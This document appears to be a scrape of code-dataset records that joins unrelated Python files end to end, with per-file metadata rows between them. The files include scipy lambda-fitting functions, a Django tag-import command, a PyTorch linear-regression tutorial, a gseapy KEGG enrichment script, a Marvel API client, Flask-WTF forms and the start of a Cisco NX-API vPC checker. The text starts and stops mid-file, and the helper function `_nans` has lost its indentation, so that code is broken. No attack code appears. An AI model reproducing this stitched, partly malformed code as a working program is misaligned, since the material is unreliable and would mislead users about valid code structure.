                         (f.__name__, ik, imu))
        return None

    if fit is None:
        fit = {}

    fit['PDU_amp'] = popt[0]
    fit['PDU_params'] = popt[1:]
    fit['lambda'] = x
    fit['PDU'] = ff(x, *popt)

    return fit
def fit_UU(d, ik, imu, f, fit=None, p0=None, ilambda_max=None):
    """
    Fit P_UU(k, mu, lambda) with a given function:
      P_UU(k, mu, lambda) = A*lambda**2*f(lambda, *params)

    Args:
      d (dict): lambda data returned by load_lambda()
      ik (int): k index
      imu (int): mu index
      f (func): fitting function f(lambda, *params)
      fit (dict): dictionary for results (created if None)
      p0 (list): initial guess for *params (amplitude A is prepended)
      ilambda_max (int): use only the first ilambda_max lambda bins

    Returns:
      fit (dict) with keys 'PUU_amp', 'PUU_params', 'lambda', 'PUU',
      or None if the fit did not converge
    """
    def ff(x, A, *params):
        # model: quadratic amplitude times the shape function f
        return A*x**2*f(x, *params)

    x = d['lambda'][:ilambda_max]
    y = d['summary']['PUU'][ik, imu, :ilambda_max]

    # remove nans
    idx = np.isfinite(y)
    x = x[idx]
    y = y[idx]

    # initial guess; p0[0] is the amplitude A
    if p0 is None:
        p0 = [0, ]*(f.__code__.co_argcount)
    else:
        p0 = [0.0, ] + p0

    # amplitude guess from a representative data point; the index is
    # clamped so arrays with fewer than 11 finite points no longer raise
    # IndexError, and x == 0 no longer divides by zero
    i0 = min(10, len(x) - 1)
    if i0 >= 0 and x[i0] != 0:
        p0[0] = y[i0]/x[i0]**2

    assert len(p0) == f.__code__.co_argcount

    # fitting
    try:
        popt, pcov = curve_fit(ff, x, y, p0=p0)
    except RuntimeError:
        sys.stderr.write('Warning: unable to fit UU with %s; ik=%d imu=%d\n' %
                         (f.__name__, ik, imu))
        return None

    if fit is None:
        fit = {}

    fit['PUU_amp'] = popt[0]
    fit['PUU_params'] = popt[1:]
    fit['lambda'] = x
    fit['PUU'] = ff(x, *popt)

    return fit
def _nans(shape):
a = np.empty(shape)
a[:] = np.nan
return a
def fit_lambda(d, ik, imu, f, *,
               kind=('DD', 'DU', 'UU'),
               p0=None, ilambda_max=None):
    """
    Fit lambda plot with a fitting function f for a pair of k, mu
      P_DD(k, mu, lambda) = P_DD(k, mu, lambda=0)*f(lambda)
      P_DU(k, mu, lambda) = P_DU_amp*lambda*f(lambda)
      P_UU(k, mu, lambda) = P_UU_amp*lambda**2*f(lambda)

    Args:
      data (dict): lambda data loaded by load_lambda
      ik (array-like): index of k
      imu (array-like): index of mu
      f (func): fitting function f(lambda, fitting parameters ...)
      kind (list): fitting P_**, subset of ('DD', 'DU', 'UU')
      p0 (list): initial parameter guess

    ik, imu can be:
      integer, 1D array, or 2D array.

    Result:
      fit (dict)
      fit['PDD'] (np.array): fitted P_DD
      fit['PDU'] (np.array): fitted P_DU
      fit['PUU'] (np.array): fitted P_UU
      fit['PDD_params']: best fitting parameters in f
      fit['PDU_params']: best fitting parameters in f
      fit['PUU_params']: best fitting parameters in f
      fit['PDU_amp']: amplitude A in PDU = A*lambda*f(lambda)
      fit['PUU_amp']: amplitude A in PUU = A*lambda**2*f(lambda)

      None if fitting failed
    """
    # single pair of (ik, imu): delegate straight to the per-kind fitters
    if isinstance(ik, int) and isinstance(imu, int):
        fit = {}
        # NaN at lambda=0 marks a (k, mu) bin with no data
        if np.isnan(d['summary']['PDD'][ik, imu, 0]):
            return None
        if 'DD' in kind:
            fit_DD(d, ik, imu, f, fit, p0=p0, ilambda_max=ilambda_max)
        if 'DU' in kind:
            fit_DU(d, ik, imu, f, fit, p0=p0, ilambda_max=ilambda_max)
        if 'UU' in kind:
            fit_UU(d, ik, imu, f, fit, p0=p0, ilambda_max=ilambda_max)
        return fit

    # Convert ik, imu to np.array if they are array-like
    if type(ik) != np.ndarray:
        ik = np.array(ik, ndmin=1)

    if len(ik.shape) == 1:
        if type(imu) != np.ndarray:
            imu = np.array(imu, ndmin=1)
        if len(imu.shape) != 1:
            raise TypeError('If ik is an 1D array, '
                            'imu must also be an 1D array: '
                            'imu.shape {}'.format(imu.shape))
        nk = len(ik)
        nmu = len(imu)
        # Convert ik and imu to 2D arrays by repeating same row/column
        ik = ik.reshape((nk, 1)).repeat(nmu, axis=1)
        imu = imu.reshape((1, nmu)).repeat(nk, axis=0)

    # 2D arrays of ik imu
    if ik.shape != imu.shape:
        raise TypeError('2D arrays ik imu must have the same shape: '
                        '{} != {}'.format(ik.shape, imu.shape))

    nk = ik.shape[0]
    nmu = ik.shape[1]
    # number of free parameters for f + linear RSD amplitude
    nparam = f.__code__.co_argcount
    nlambda = len(d['lambda'][:ilambda_max])

    # Arrays for fitting results; NaN-filled so unfit bins stay NaN
    if 'DD' in kind:
        PDD_params = _nans((nk, nmu, nparam))
        PDD = _nans((nk, nmu, nlambda))
    if 'DU' in kind:
        PDU_params = _nans((nk, nmu, nparam))
        PDU = _nans((nk, nmu, nlambda))
    if 'UU' in kind:
        PUU_params = _nans((nk, nmu, nparam))
        PUU = _nans((nk, nmu, nlambda))

    for i in range(nk):
        for j in range(nmu):
            ik_ij = ik[i, j]
            imu_ij = imu[i, j]
            if 'DD' in kind:
                fit = fit_DD(d, ik_ij, imu_ij, f, p0=p0,
                             ilambda_max=ilambda_max)
                if fit:
                    PDD_params[i, j, 0] = fit['PDD_amp']
                    PDD_params[i, j, 1:] = fit['PDD_params']
                    # NOTE(review): fit['PDD'] is NaN-pruned and may be
                    # shorter than nlambda — presumably inputs are
                    # NaN-free here; confirm against load_lambda()
                    PDD[i, j, :] = fit['PDD']
            if 'DU' in kind:
                fit = fit_DU(d, ik_ij, imu_ij, f, p0=p0,
                             ilambda_max=ilambda_max)
                if fit:
                    PDU_params[i, j, 0] = fit['PDU_amp']
                    PDU_params[i, j, 1:] = fit['PDU_params']
                    PDU[i, j, :] = fit['PDU']
            if 'UU' in kind:
                fit = fit_UU(d, ik_ij, imu_ij, f, p0=p0,
                             ilambda_max=ilambda_max)
                if fit:
                    PUU_params[i, j, 0] = fit['PUU_amp']
                    PUU_params[i, j, 1:] = fit['PUU_params']
                    PUU[i, j, :] = fit['PUU']

    fit = {}
    fit['ik'] = ik
    fit['imu'] = imu
    fit['lambda'] = d['lambda'][:ilambda_max]
    if 'DD' in kind:
        fit['PDD'] = PDD
        fit['PDD_params'] = PDD_params
    if 'DU' in kind:
        fit['PDU'] = PDU
        fit['PDU_params'] = PDU_params
    if 'UU' in kind:
        fit['PUU'] = PUU
        fit['PUU_params'] = PUU_params

    return fit
| junkoda/lambda | lib/lambdalib/lambda_fitting.py | lambda_fitting.py | py | 8,421 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "numpy.isfinite",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "scipy.optimize.curve_fit",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "numpy.isfinite",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "scipy.optimize... |
23190704074 | import csv
from django.core.management.base import BaseCommand
from recipes.models import Tag
class Command(BaseCommand):
    """Management command that seeds the Tag table from a CSV preset.

    Each CSV row holds (color, tag, slug); tags that already exist are
    left untouched.
    """

    help = 'Добавить список тэгов в базу (цвет и наименование)'

    def handle(self, *args, **options):
        created_count = 0
        with open('recipes/presets/tags.csv',
                  'r',
                  encoding='utf8'
                  ) as f:
            reader = csv.reader(f)
            for row in reader:
                color, tag, slug = row
                # get_or_create reports whether a new row was inserted, so
                # additions are counted directly instead of diffing two
                # COUNT queries (fewer queries, immune to concurrent writes).
                _, created = Tag.objects.get_or_create(
                    color=color,
                    tag=tag,
                    slug=slug
                )
                if created:
                    created_count += 1
        print(f'В базу добавлено {created_count} тэгов')
| mechnotech/foodgram-project | recipes/management/commands/add_tags.py | add_tags.py | py | 825 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "csv.reader",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "recipes.models.Tag.objects.count",
"line_number": 17,
"usage_type": "call"
},
{
... |
6858043580 | ### Introduction to Pytorch Workflow timestamp to where it starts (link: https://www.youtube.com/watch?v=V_xro1bcAuA): 4:22:01
import torch
from torch import nn  # nn contains all of pytorch's building blocks for neuro networks; the pytorch documentation lists all the available layers
# you can combine layers in all the ways imaginable to make a neuro network model do what you want it to do
import matplotlib.pyplot as plt
from pathlib import Path
"""
preparing and loading data (data can be almost anything in machine learning, like images, csv, videos, audio, text, or even dna)
machine learning is a game of 2 major parts: (that can be further subdivided into many other parts)
1. get data into a numerical representation (tensors)
2. build a model to learn patterns in that numerical representation
"""
# making data using a linear regression formula:
# creating known parameters: (in an actual dataset scraped from the internet, these won't be given; these are what the model is going to figure out)
weight = 0.7
bias = 0.3
# create the input range:
start = 0
end = 1
step = 0.02
X = torch.arange(start, end, step).unsqueeze(dim=1)  # X is the feature tensor; unsqueeze adds the extra dimension needed later
y = weight * X + bias  # the machine won't know this and will have to figure it out for itself; y is the target
print(X[:10], y[:10], len(X), len(y))
# splitting data into training and test sets (one of the most important concepts in machine learning in general)
"""
visualizing the three datasets by comparing it to a school course:
training set: you can compare this to the course materials at a university that you would learn throughout the year, the model too would learn patterns from here
validation set: you can compare this to a practice exam, which would tune the model patterns/adjust the model's patterns (not always needed)
Test set: you can compare this to a final exam: which would see if the model is ready to be implimented/tests the model's performance on data it hasn't seen before
Goal: generalization (the ability for a machine learning model to perform well on data it hasn't seen before)
amount of data used for training set: ~60-80% (always needed)
amount of data used for validation set: 10-20% (not always needed)
amount of data used for test set: 10-20% (always needed)
"""
# create a train/test split/set (set and split mean the same thing in this case)
train_split = int(0.8 * len(X))  # 80% of samples go to training
X_train, y_train = X[:train_split], y[:train_split]  # gets all the data that's previous to that index
X_test, y_test = X[train_split:], y[train_split:]  # gets all the data that is past that index
print(len(X_train), len(y_train), len(X_test), len(y_test))  # prints the amount of training features, training labels, testing features, testing labels
# NOTE: you can also use the sklearn/scikit module to split the training data in a more random way
## building a function to visualize the data
def plot_prediction(train_data = X_train,
                    train_lables = y_train,
                    test_data = X_test,
                    test_lables = y_test,
                    predictions = None):
    """
    Plots training data, test data, and compares predictions.

    Args:
        train_data, train_lables: training features/labels (defaults are
            the module-level split above)
        test_data, test_lables: testing features/labels
        predictions: optional model predictions over test_data, drawn in
            red when given
    """
    plt.figure(figsize=(10, 7))
    # plot training data in blue
    plt.scatter(train_data, train_lables, c="blue", s=4, label="Training Data")
    # plot testing data in green
    plt.scatter(test_data, test_lables, c="green", s=4, label="Testing Data")
    # identity test, not '!=': comparing a tensor with '!=' is elementwise
    # and does not reliably answer "was an argument passed?"
    if predictions is not None:
        # plot the predictions if they exist
        plt.scatter(test_data, predictions, c="red", s=4, label="Predictions")
    plt.legend(prop={"size": 14})
    plt.show()
## building a model:
class LinearRegressionModel(nn.Module):
    """Single-feature linear model: y = weight * x + bias.

    Both parameters start from torch.randn draws and are learned through
    gradient descent during training.
    """

    def __init__(self):
        super().__init__()
        # One scalar parameter each for slope and intercept. The randn
        # draws happen in this order (weight, then bias), so seeded runs
        # stay reproducible.
        self.weight = nn.Parameter(
            torch.randn(1, dtype=torch.float, requires_grad=True))
        self.bias = nn.Parameter(
            torch.randn(1, dtype=torch.float, requires_grad=True))

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        """Apply the linear regression formula to the input batch."""
        scaled = self.weight * x
        return scaled + self.bias
### any subclass of nn.module needs to override the forward() method from model since it defines the computation of the model
"""
what the model does:
- Starts with random values (weights and biases)
- looks at training data and adjusts the random values to better represent/get closer to the ideal values (weight and bias values of our original formula)
How does it do it:
1. Gradient Descent
2. Back Propagation
also check out the pytorch cheatsheet by googling pytorch cheatsheet
Model building essentials:
- torch.nn: contains all of the building materials for computational graphs (a neuro networks can be considered a computational graph)
- torch.nn.Parameter(): what parameters our model should try and learn, often a pytorch layer from pytorch.nn will set these for us
- torch.nn.Module: the base class for all neuro network modules, if you subclass it, you should override forward()
- torch.optim: this references the optimizer in pytorch, they will help with gradient descent and contains various optimization algorithms
- torch.data.Dataset: represents a map between the key (label) and sample (feature) pairs of your data, such as images and their associated labels
- torch.data.DataLoader: creates a python iterable over a torch Dataset, allowing you to iterate over your data
- torchvision.transforms: for pictures and vision into data into models
- torchmetrics:
- def forward(): all nn.Module subclasses require you to override this, as previously stated, this method defines what happens in the forward computation
"""
## Checking the contents of our model:
# to check the parameters of our model, we can use .parameters():
# set the seed so the values won't vary and results stay consistent; without this, the
# tensor values in LinearRegressionModel would be random every time (which is what we
# want in practice, but not needed for educational purposes)
torch.manual_seed(42)
# initialize model
model = LinearRegressionModel()
print(list(model.parameters()))
# list named parameters (the names come from the self.weight and self.bias attributes)
print(model.state_dict())
## making predictions using torch.inference_mode()
# context manager; a good habit since it turns off gradient tracking while predicting,
# which makes things a lot faster on larger datasets
# there's also torch.no_grad(), but inference_mode is the preferred option
with torch.inference_mode():
    y_preds = model(X_test)
print(f"Predictions: {y_preds}\nTest Data: {y_test}")
plot_prediction(predictions=y_preds)
"""## Training the model (moving from unknown/random parameters closer to the actual accurate parameters, aka moving from a poor representation of the data to a better one)
The loss function tells us how wrong our model's predictions are
- note that a loss function can also be refered to as a cost function or a criterion in different areas
Things we need to train:
- Loss function - a function that measures how wrong our model's predictions are compared to the idea outputs, the lower the better
- Optimizer - takes into account the loss of a model and adjusts the model's parameters (e.g. weight and bias) to improve the loss function
For pytorch specifically
, we need:
- a training loop
- a testing look
you can check out all the loss functions in the pytorch documentation: https://pytorch.org/docs/stable/nn.html#loss-functions
"""
#choosing and implimenting a loss function and a optimizer:
#using L1Loss/Mean Absolute Error (taking the absolute difference between all the expected value/ideal value and the actual value and returns its average)
#measures how wrong our data is
loss_fn = nn.L1Loss()
#setup an optimizer (using a Stoch(SGD) algorithm)
#an optimizer adjusts the parameters according to the loss function to reduce the loss
optimizer = torch.optim.SGD(model.parameters(), #the parameters that its going to take a look at/optimize
lr= 0.01) #learning rate: one of the most important hyperparameter (we set) you can set (regular parameters are set by the code)
#general idea of how optimizers work: it first increases the value in one direction, if the loss increases, then it increases in the other direction until the best value is achieved
"""
The learning rate (lr) is how mcuh it adjusts the parameters given to reduce the loss function/optimize the values, so the smaller the lr, the smaller the change in the parameter
the larget the learning rate, the larger the change int he parameter, if the lr is too bigthen it might skip over the optimal value, but if its too smal, then it'll take too
long to optimize
Q&A:
which loss function and optimizer should I use?
this depends on the context, with experience you'll get an idea of what works and what doesn't with your particular data set
ex. a regression problem would require something like a loss function of nn.L1Loss() and an optimizer like torch.optim.SGD()
but for classification problems like classifying whether or not a photo is of a dog or a cat, you'll likely want to use a loss function of nn.BCELoss() (binary cross entropy loss)
"""
## Building a training Loop (and a testing loop):
"""
steps:
0. looping through the data
1. forward pass (moving our data through the forward() method), also called forward propagation, moving in the opposite direction of a back propagation
2. calculate the loss: compare the forward pass predictions to the ground truth labels
3. optimizer zero grad
4. Back propagation (loss backwards?): data moves backwards through the network to calculate the gradients of each of the parameters of the model with respect to loss
5. optimizer step: use the optimizer to adjust the model's parameters to try to improve the loss
"""
#an epoch is one loop through the data, a hyper parameter because we set it ourselves
epochs = 200
#track different values and tracks model progress, used to plot model progress later on, useful for comparing with future experiments
epoch_count = []
loss_values = []
test_loss_values = []
print(model.state_dict())
for epoch in range(epochs):
#set the model to training mode, training mode sets all paramaters that requires gradients to require gradients, requires_grad=True
model.train()
#forward pass:
y_pred = model(X_train)
#loss function:
loss = loss_fn(y_pred, y_train) #predictions first then target
print(f"Loss: {loss}")
#optimizer zero_grad()
optimizer.zero_grad()
#4. back propagation on loss with respect to the parameters of the model
loss.backward()
#Optimizer, we want to step towards a gradient with a slope of 0 (slope of the loss function) or as low as possible, this is gradient descent and pytorch is doing this for you
#in torch autograd
optimizer.step() #by default how the optimizer changes will accumulate through the loop, so we have to zero them above (shown in step 3) for the next iteration of the loop
### testing
model.eval() #evaluation mode, turns off training, starts testing
#this turns off different stuff in the model that's not used for testing (essentially its like dropout/batch norm layers, read docs for more info)
with torch.inference_mode(): #turns off gradient tracking for inference and a couple of other stuff to make testing faster. torch.no_grad() does the same but slower
#1. foward pass:
test_pred = model(X_test)
#2. loss calculation:
test_loss = loss_fn(test_pred, y_test) #y_test is the test labels, calculates the testing loss value
if epoch % 10 == 0:
epoch_count.append(epoch)
loss_values.append(loss)
test_loss_values.append(test_loss)
print(f"Epoch: {epoch} | Loss: {loss} | Test loss: {test_loss}")
print(model.state_dict())
#matplotlib works with numpy, not working with the gpu because i don't have one so i can skip the "".cpu()"".numpy() part and just go right to .numpy
plt.plot(torch.tensor(epoch_count).numpy(), torch.tensor(loss_values).numpy(), label="Train loss")
plt.plot(torch.tensor(epoch_count).numpy(), torch.tensor(test_loss_values).numpy(), label="Test loss")
plt.title("Training and test loss curves")
plt.ylabel("Loss")
plt.xlabel("Epoch")
plt.show()
#there is also learning rate scheduling, which is basically starting with big steps in the learning rate, then slowly lowering it,like reacing for the coin at the backofthe couch
#the lowest point is the convergence, its the point where the loss function is at its minimum
#the steps in the loop can be turned into a function, do later, first build intuition for it
with torch.inference_mode():
y_preds_new = model(X_test)
plot_prediction(predictions=y_preds_new)
## Saving models:
"""
there are 3 main methods you should know about when it comes to saving and loading: (https://pytorch.org/tutorials/beginner/saving_loading_models.html)
1. torch.save(): saves a serialized object to disk, uses the python pickle library's utility for serialization. Models, tensors, and dictionaries are all kinds of objects that
can be saved using this function, its recommended to save the state_dict, but you can also save the entire model
2. torch.load(): uses the pickle module to unpickle facilities to deserialize object files to memory, in the process also facilitates the device that the data is being loaded
into
3. torch.nn.Module.load_state_dict(): Loads a model's parameter dictionary using a deserialized state_dict, for more info, check out the website linked above
"""
# create model directory:
MODEL_PATH = Path("models")
MODEL_PATH.mkdir(parents=True, exist_ok=True)
# create a model save path
MODEL_NAME = "01_pytorch_workflow_tutorial.pth"  # the .pth extension is the convention for a saved pytorch model
MODEL_SAVE_PATH = MODEL_PATH / MODEL_NAME
# saving only the model's state_dict() (the model's weights, biases, etc.)
print(f"saving model to: {MODEL_SAVE_PATH}")
torch.save(obj=model.state_dict(),
           f=MODEL_SAVE_PATH)
## Loading a model into a new instance of the model:
new_model = LinearRegressionModel()
# loading the state dict — the pre-trained values replace the random initial values
new_model.load_state_dict(torch.load(f=MODEL_SAVE_PATH))  # loads all the saved state (weights, biases, etc.)
# making predictions using the loaded model:
new_model.eval()
with torch.inference_mode():
    new_model_pred = new_model(X_test)
    y_preds = model(X_test)  # in case the y_preds value was changed
## compare the predictions/forward() calculations of both models; they should be equal since the parameter values are the same
print(new_model_pred == y_preds)
## continued in Workflow_ractice.py
##more info on loading and saving models on the pytorch docs: https://pytorch.org/tutorials/beginner/saving_loading_models.html | attackGoose/AI-Notebook-and-projects | pytorch/Learning stuff/2_Learning_pytorch_workflow.py | 2_Learning_pytorch_workflow.py | py | 15,967 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "torch.arange",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 70,
"usage_type": "name"
},
{
"api_name": "matplotlib.py... |
19491319237 | from Permission import Permission
import pandas as pd
import requests
class Get_info:
    """Fetches and summarises a Marvel character through the Marvel API."""

    urlMarvel = 'http://gateway.marvel.com/v1/public/characters/'  # Marvel API's base characters endpoint
def __init__ (self, id):
"""Accessing Marvel API to get information about desired character using its id.
Information retrieved: 1. name, 2. total number of events, 3. total number of series
available, 4. total number of comics and 5. price of the most expensive comic that
the charatcer was featured in"""
self.id = id #id needs to be given
link = self.urlMarvel + str(self.id) #url for specific Marvel Character
response = requests.get(link, params = Permission().parameters()).json()
response_price = requests.get(link + '/comics', params = Permission().parameters()).json() #Request for price feature
#Get relevant features related to the character (name, events,series,comics & highest price)
self.name = response['data']['results'][0]['name']
self.events = response['data']['results'][0]['events']['available']
self.series = response['data']['results'][0]['series']['available']
self.comics = response['data']['results'][0]['comics']['available']
#To get the highest price per comic
all_prices_per_comic_list = []
for dicts in response_price['data']['results']:
for prices in dicts['prices']:
all_prices_per_comic_list.append(prices['price'])
#Highest price info
self.price = max(all_prices_per_comic_list, default=0)
    def filtered_info(self):
        """Return a one-row pandas DataFrame with all the information
        gathered for the desired character."""
        # Each value is wrapped in a list so the frame has exactly one row.
        entry = pd.DataFrame({
            'Character Name' : [self.name],
            'Character ID' : [self.id],
            'Total Available Events' : [self.events],
            'Total Available Series' : [self.series],
            'Total Available Comics' : [self.comics],
            'Price of the Most Expensive Comic' : [self.price]})
return entry | Guibas1812/create-api-marvel-characters | Get_Info.py | Get_Info.py | py | 2,168 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "requests.get",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "Permission.Permission",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "Permission.Permission... |
25993094849 | from datetime import datetime
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, TextAreaField, SelectField, FloatField
from wtforms.validators import DataRequired, Length, Regexp
class NewOrderForm(FlaskForm):
    """Create/edit form for a repair order.

    Pass ``order`` to pre-fill the fields from an existing order, and
    ``staff_choices``/``type_choices`` to populate the select boxes.
    """

    description = TextAreaField("Опис: ",
                                validators=[DataRequired(),
                                            Length(max=1000)])
    client = StringField('Клієнт',
                         id='client_autocomplete',
                         validators=[DataRequired(),
                                     Length(max=200)])
    # default must be a callable: a bare datetime.now() would be evaluated
    # once at import time, so every form would keep showing that stale date
    # for the whole lifetime of the server process.
    created_at = StringField("Дата створення",
                             validators=[DataRequired(),
                                         Regexp(
                                             r'^(0[1-9]|[12][0-9]|3[01])[\.](0[1-9]|1[012])[\.]((19|20)\d\d|\d\d)$')],
                             default=lambda: datetime.now().strftime("%d.%m.%Y"))
    serial = StringField("Серійний номер",
                         id='serial_autocomplete',
                         validators=[Length(max=200)])
    # NOTE(review): DataRequired() rejects a price of 0; if zero-cost orders
    # are valid, InputRequired() would be the right validator — confirm.
    price = FloatField("Ціна", validators=[DataRequired()])
    staff = SelectField("Виконавець")
    type = SelectField("Тип замовлення")
    submit = SubmitField("Зберегти")

    def __init__(self, order=None, staff_choices=None, type_choices=None, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Pre-fill field data from an existing order (edit mode).
        if order:
            self.description.data = order.description
            self.client.data = order.client
            self.created_at.data = order.created_at.strftime("%d.%m.%Y")
            self.serial.data = order.device.serial
            self.price.data = order.price
            self.staff.data = order.staff.name
            self.type.data = order.type.name
        if staff_choices:
            self.staff.choices = staff_choices
        if type_choices:
            self.type.choices = type_choices
class NewClientForm(FlaskForm):
    """Create/edit form for a client (a person or a company)."""

    name = StringField("Ім'я фізичної або юридичної особи",
                       validators=[DataRequired(),
                                   Length(max=200)])
    # validators = [Regexp(r'^(\+\d{1,2}\s?)?((\(?\d{3}\)?)[\s]?\d{3}[\s]?\d{4}|(\(?\d{3,4}\)?)[\s]?\d{3}[\s]?\d{3})$')]
    phone = StringField("Номер телефону",
                        validators=[DataRequired(),
                                    Length(max=80)])
    address = StringField("Адреса",
                          validators=[Length(max=200)])
    notes = TextAreaField("Примітки",
                          validators=[Length(max=1000)])
    submit = SubmitField("Зберегти")

    def __init__(self, client=None, *args, **kwargs):
        """Pre-fill the fields from an existing client when given."""
        super().__init__(*args, **kwargs)
        if client:
            self.name.data = client.name
            self.phone.data = client.phone
            self.address.data = client.address
            self.notes.data = client.notes
class NewDeviceForm(FlaskForm):
    """Create/edit form for a device; the serial number is mandatory."""

    name = StringField("Назва")
    serial = StringField("Серійний номер", validators=[DataRequired()])
    submit = SubmitField("Зберегти")

    def __init__(self, device=None, *args, **kwargs):
        """Pre-fill the fields from an existing device when given."""
        super().__init__(*args, **kwargs)
        if device:
            self.name.data = device.name
            self.serial.data = device.serial
class NewStaffForm(FlaskForm):
    """Minimal form for adding a staff member by name."""

    name = StringField("Ім'я")
    submit = SubmitField("Зберегти")
class DeleteConfirmForm(FlaskForm):
    """Single-button confirmation form for destructive delete actions."""

    delete = SubmitField("Так, видалити")
class NavigationForm(FlaskForm):
    """Search/filter/sort controls for the order list page."""

    search_field = StringField("Введіть пошуковий запит")
    status_field = SelectField('Статус')
    type_field = SelectField('Тип')
    # (value, label) pairs; the values are interpreted by the view's sorter.
    sort_by_field = SelectField('Сортувати за', choices=[('new_first', 'Датою (нові спочатку)'),
                                                         ('old_first', 'Датою (старі спочатку)'),
                                                         ('client', 'Клієнтом'),
                                                         ('status', 'Статусом')])

    def __init__(self, status_choices=None, type_choices=None, *args, **kwargs):
        """Populate the status/type selects with caller-supplied choices."""
        super().__init__(*args, **kwargs)
        if status_choices:
            self.status_field.choices = status_choices
        if type_choices:
            self.type_field.choices = type_choices
| 1Lorde/orders-tracker | orders_tracker/forms.py | forms.py | py | 4,563 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "flask_wtf.FlaskForm",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "wtforms.TextAreaField",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "wtforms.validators.DataRequired",
"line_number": 10,
"usage_type": "call"
},
{
"api_name"... |
43734236645 | # -*- coding: utf-8 -*-
"""
Created on Fri Apr 16 13:14:57 2021
@author: Samael Olascoaga
@email: olaskuaga@gmail.com
"""
import pandas as pd
import gseapy as gp
import matplotlib.pyplot as plt
from gseapy.plot import barplot, dotplot
import numpy as np
import seaborn as sns
sns.set_style("whitegrid")
gene_list = pd.read_csv('common.csv', header=None)
glist = gene_list.squeeze().str.strip().tolist()
names = gp.get_library_name()
enr = gp.enrichr(gene_list= glist,
gene_sets=['KEGG_2019_Human'],
organism='Human', # don't forget to set organism to the one you desired! e.g. Yeast
description='KEGG common targets',
# no_plot=True,
cutoff=0.5 # test dataset, use lower value from range(0,1)
)
resultados = enr.results.head(15)
resultados['-log10(FDR)'] = -np.log10(resultados['Adjusted P-value'])
resultados['Genes'] = resultados['Genes'].str.split(';')
resultados['Genes'] = resultados['Genes'].apply(lambda x: len(x))
g = sns.scatterplot(data=resultados, x="-log10(FDR)", y="Term", hue='-log10(FDR)', palette="seismic"
, size="Genes", sizes=(30, 300), legend=True)
g.legend(loc=6, bbox_to_anchor=(1, 0.5), ncol=1)
plt.ylabel('')
plt.xlabel('-log10(FDR)')
plt.title('KEGG Common targets')
plt.savefig(r'KEGG_common' + '.svg', format='svg', dpi=600, bbox_inches = "tight" )
| Olascoaga/Senotherapy | ora.py | ora.py | py | 1,448 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "seaborn.set_style",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "gseapy.get_library_name",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "gseapy.enri... |
73554593149 | import numpy as np
from functions import mean_absolute_percentage_error
import torch

# Load the ground-truth labels and model predictions saved by the training run.
archive = np.load('predictions.npz')
labels = torch.Tensor(archive['labels'])
preds = torch.Tensor(archive['pred'])

# Boolean masks selecting the sub-populations of interest.
mask_1500 = labels < 1500
mask_1300 = labels < 1300

preds_1500, labels_1500 = preds[mask_1500], labels[mask_1500]
preds_1300, labels_1300 = preds[mask_1300], labels[mask_1300]

# Report population sizes, per-population MAPE, and the raw <1300 values.
print('all data: ', preds.shape[0])
print('under 1500 data: ', preds_1500.shape[0])
print('under 1300 data: ', preds_1300.shape[0])
print('mape (all data): ', mean_absolute_percentage_error(labels, preds))
print('mape (under 1500): ', mean_absolute_percentage_error(labels_1500, preds_1500))
print('mape (under 1300): ', mean_absolute_percentage_error(labels_1300, preds_1300))
print('label under 1300: ', labels_1300)
print('pred under 1300: ', preds_1300)
| arseniybelkov/Determining_HOCB | auxillary_functions/analizePredictions.py | analizePredictions.py | py | 1,015 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "numpy.load",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "torch.Tensor",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "torch.Tensor",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "functions.mean_absolute_percentag... |
40411416951 | #!/usr/bin/env python3
"""
Name: vpc_consistency.py
Description: NXAPI: display inconsistent vpc parameters
Example output when vpc is consistent:
% ./vpc_consistency.py --vault hashicorp --devices cvd_leaf_2 --interface Po11,Po12
192.168.11.103 cvd-1312-leaf all 22 global vpc params are consistent
192.168.11.103 cvd-1312-leaf all 7 vni vpc params are consistent
192.168.11.103 cvd-1312-leaf all 12 vlans vpc params are consistent
192.168.11.103 cvd-1312-leaf Po11 all 23 interface vpc port-channel params are consistent
192.168.11.103 cvd-1312-leaf Po12 all 23 interface vpc port-channel params are consistent
%
Example output when vpc po allowed-vlans are mismatched:
% ./vpc_consistency.py --vault hashicorp --devices cvd_leaf_2 --interface Po11,Po12
192.168.11.103 cvd-1312-leaf all 22 global vpc params are consistent
192.168.11.103 cvd-1312-leaf all 7 vni vpc params are consistent
192.168.11.103 cvd-1312-leaf all 12 vlans vpc params are consistent
192.168.11.103 cvd-1312-leaf Po11 Allowed VLANs
vpc-param-type: -
vpc-param-local-val: 1111-1112
vpc-param-peer-val: 1111
192.168.11.103 cvd-1312-leaf Po11 Local suspended VLANs
vpc-param-type: -
vpc-param-local-val: 1112
vpc-param-peer-val: -
192.168.11.103 cvd-1312-leaf Po12 all 23 interface vpc port-channel params are consistent
%
"""
our_version = 109
script_name = "vpc_consistency"
# standard libraries
import argparse
from concurrent.futures import ThreadPoolExecutor
# local libraries
from nxapi_netbox.args.args_cookie import ArgsCookie
from nxapi_netbox.args.args_nxapi_tools import ArgsNxapiTools
from nxapi_netbox.general.log import get_logger
